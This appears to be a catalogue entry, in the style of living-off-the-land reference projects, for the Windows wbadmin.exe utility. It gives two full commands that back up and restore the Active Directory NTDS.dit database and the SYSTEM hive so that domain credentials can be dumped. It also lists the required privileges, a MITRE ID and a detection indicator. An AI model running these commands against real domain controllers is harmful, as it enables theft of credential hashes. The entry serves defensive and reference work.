---
Name: wbadmin.exe
Description: Windows Backup Administration utility
Author: Chris Eastwood
Created: 2024-04-05
Commands:
  - Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
    Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)
    Usecase: Snapshoting of Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator, Backup Operators, SeBackupPrivilege
    MitreID: T1003.003
    OperatingSystem: Windows Server
  - Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
    Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.
    Usecase: Dumping of Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator, Backup Operators, SeBackupPrivilege
    MitreID: T1003.003
    OperatingSystem: Windows Server
Full_Path:
  - Path: C:\Windows\System32\wbadmin.exe
Detection:
  - IOC: wbadmin.exe command lines containing "NTDS" or "NTDS.dit"
Resources:
  - Link: https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960